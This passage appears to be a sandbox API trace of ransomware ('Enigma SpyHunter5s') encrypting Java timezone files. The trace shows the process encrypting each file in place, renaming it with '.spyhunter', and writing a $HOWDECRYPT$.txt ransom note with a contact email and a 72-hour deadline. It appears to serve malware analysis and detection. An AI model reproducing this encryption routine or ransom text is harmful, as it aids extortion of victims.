(x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.spyhunter") returned 69 [0171.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne.spyhunter")) returned 1 [0171.564] GetProcessHeap () returned 0x2c0000 [0171.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.564] GetProcessHeap () returned 0x2c0000 [0171.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.564] GetProcessHeap () returned 0x2c0000 [0171.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60780 | out: hHeap=0x2c0000) returned 1 [0171.564] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e510 | out: pbBuffer=0x248e510) returned 1 [0171.564] GetProcessHeap () returned 0x2c0000 [0171.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e508*=0x30) returned 1 [0171.564] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.566] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas") returned 59 [0171.566] StrStrW (lpFirst="Caracas", lpSrch=".txt") returned 0x0 [0171.566] GetProcessHeap () returned 0x2c0000 [0171.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.566] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4cc*=0x55, lpOverlapped=0x0) returned 1 [0171.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.567] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4cc*=0x55, lpOverlapped=0x0) returned 1 [0171.567] GetProcessHeap () returned 0x2c0000 [0171.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.567] WriteFile (in: hFile=0xb0, lpBuffer=0x248e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x248e50c*, lpNumberOfBytesWritten=0x248e4cc*=0x4, lpOverlapped=0x0) returned 1 [0171.567] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4cc*=0x30, lpOverlapped=0x0) returned 1 [0171.568] CloseHandle (hObject=0xb0) returned 1 [0171.568] GetProcessHeap () returned 0x2c0000 [0171.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.568] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.spyhunter") returned 69 [0171.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas.spyhunter")) returned 1 [0171.570] GetProcessHeap () returned 0x2c0000 [0171.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.571] GetProcessHeap () returned 0x2c0000 [0171.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.571] GetProcessHeap () returned 0x2c0000 [0171.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e606c0 | out: hHeap=0x2c0000) returned 1 [0171.571] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e510 | out: pbBuffer=0x248e510) returned 1 [0171.571] GetProcessHeap () returned 0x2c0000 [0171.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e508*=0x30) returned 1 [0171.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.573] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun") returned 58 [0171.573] StrStrW (lpFirst="Cancun", lpSrch=".txt") returned 0x0 [0171.573] GetProcessHeap () returned 0x2c0000 [0171.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.573] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4cc*=0x318, lpOverlapped=0x0) returned 1 [0171.739] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffce8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.739] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4cc*=0x318, lpOverlapped=0x0) returned 1 [0171.739] GetProcessHeap () returned 0x2c0000 [0171.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.739] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.739] WriteFile (in: hFile=0xb0, lpBuffer=0x248e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x248e50c*, lpNumberOfBytesWritten=0x248e4cc*=0x4, lpOverlapped=0x0) returned 1 [0171.739] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4cc*=0x30, lpOverlapped=0x0) returned 1 [0171.739] CloseHandle (hObject=0xb0) returned 1 [0171.739] GetProcessHeap () returned 0x2c0000 [0171.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.740] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.spyhunter") returned 68 [0171.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun.spyhunter")) returned 1 [0171.742] GetProcessHeap () returned 0x2c0000 [0171.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.742] GetProcessHeap () returned 0x2c0000 [0171.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.742] GetProcessHeap () returned 0x2c0000 [0171.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60600 | out: hHeap=0x2c0000) returned 1 [0171.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e508 | out: pbBuffer=0x248e508) returned 1 [0171.742] GetProcessHeap () returned 0x2c0000 [0171.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e500*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e500*=0x30) returned 1 [0171.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.743] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba") returned 57 [0171.743] StrStrW (lpFirst="Aruba", lpSrch=".txt") returned 0x0 [0171.743] GetProcessHeap () returned 0x2c0000 [0171.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.743] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4c4*=0x4d, lpOverlapped=0x0) returned 1 [0171.744] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.744] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4c4*=0x4d, lpOverlapped=0x0) returned 1 [0171.744] GetProcessHeap () returned 0x2c0000 [0171.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.744] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.744] WriteFile (in: hFile=0xb0, lpBuffer=0x248e504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4c4, lpOverlapped=0x0 | out: lpBuffer=0x248e504*, lpNumberOfBytesWritten=0x248e4c4*=0x4, lpOverlapped=0x0) returned 1 [0171.744] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4c4*=0x30, lpOverlapped=0x0) returned 1 [0171.745] CloseHandle (hObject=0xb0) returned 1 [0171.745] GetProcessHeap () returned 0x2c0000 [0171.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.745] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba.spyhunter") returned 67 [0171.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba.spyhunter")) returned 1 [0171.746] GetProcessHeap () returned 0x2c0000 [0171.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.746] GetProcessHeap () returned 0x2c0000 [0171.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.746] GetProcessHeap () returned 0x2c0000 [0171.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60180 | out: hHeap=0x2c0000) returned 1 [0171.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.747] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0171.747] WriteFile (in: hFile=0xb0, lpBuffer=0x248e43b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x248e43b*, lpNumberOfBytesWritten=0x248e564*=0x127, lpOverlapped=0x0) returned 1 [0171.748] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0171.748] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e564*=0x2ac, lpOverlapped=0x0) returned 1 [0171.748] CloseHandle (hObject=0xb0) returned 1 [0171.748] GetProcessHeap () returned 0x2c0000 [0171.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea558 | out: hHeap=0x2c0000) returned 1 [0171.748] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e500 | out: pbBuffer=0x248e500) returned 1 [0171.749] GetProcessHeap () returned 0x2c0000 [0171.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.749] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4f8*=0x30) returned 1 [0171.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.749] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia") returned 69 [0171.749] StrStrW (lpFirst="Ushuaia", lpSrch=".txt") returned 0x0 [0171.749] GetProcessHeap () returned 0x2c0000 [0171.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.750] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4bc*=0x225, lpOverlapped=0x0) returned 1 [0171.750] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.750] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4bc*=0x225, lpOverlapped=0x0) returned 1 [0171.750] GetProcessHeap () returned 0x2c0000 [0171.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.751] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.751] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x248e4fc*, lpNumberOfBytesWritten=0x248e4bc*=0x4, lpOverlapped=0x0) returned 1 [0171.751] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4bc*=0x30, lpOverlapped=0x0) returned 1 [0171.751] CloseHandle (hObject=0xb0) returned 1 [0171.751] GetProcessHeap () returned 0x2c0000 [0171.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.751] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.spyhunter") returned 79 [0171.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia.spyhunter")) returned 1 [0171.756] GetProcessHeap () returned 0x2c0000 [0171.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.756] GetProcessHeap () returned 0x2c0000 [0171.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.756] GetProcessHeap () returned 0x2c0000 [0171.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d398 | out: hHeap=0x2c0000) returned 1 [0171.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e500 | out: pbBuffer=0x248e500) returned 1 [0171.757] GetProcessHeap () returned 0x2c0000 [0171.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4f8*=0x30) returned 1 [0171.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.758] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis") returned 70 [0171.758] StrStrW (lpFirst="San_Luis", lpSrch=".txt") returned 0x0 [0171.758] GetProcessHeap () returned 0x2c0000 [0171.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.758] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4bc*=0x22d, lpOverlapped=0x0) returned 1 [0171.759] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.759] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4bc*=0x22d, lpOverlapped=0x0) returned 1 [0171.759] GetProcessHeap () returned 0x2c0000 [0171.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.760] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.760] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x248e4fc*, lpNumberOfBytesWritten=0x248e4bc*=0x4, lpOverlapped=0x0) returned 1 [0171.760] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4bc*=0x30, lpOverlapped=0x0) returned 1 [0171.760] CloseHandle (hObject=0xb0) returned 1 [0171.760] GetProcessHeap () returned 0x2c0000 [0171.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.760] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.spyhunter") returned 80 [0171.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis.spyhunter")) returned 1 [0171.762] GetProcessHeap () returned 0x2c0000 [0171.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.762] GetProcessHeap () returned 0x2c0000 [0171.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.762] GetProcessHeap () returned 0x2c0000 [0171.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cf60 | out: hHeap=0x2c0000) returned 1 [0171.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4f8 | out: pbBuffer=0x248e4f8) returned 1 [0171.762] GetProcessHeap () returned 0x2c0000 [0171.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4f0*=0x30) returned 1 [0171.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.764] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan") returned 70 [0171.764] StrStrW (lpFirst="San_Juan", lpSrch=".txt") returned 0x0 [0171.764] GetProcessHeap () returned 0x2c0000 [0171.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.764] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4b4*=0x22d, lpOverlapped=0x0) returned 1 [0171.765] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.765] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4b4*=0x22d, lpOverlapped=0x0) returned 1 [0171.765] GetProcessHeap () returned 0x2c0000 [0171.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.765] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.765] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x248e4f4*, 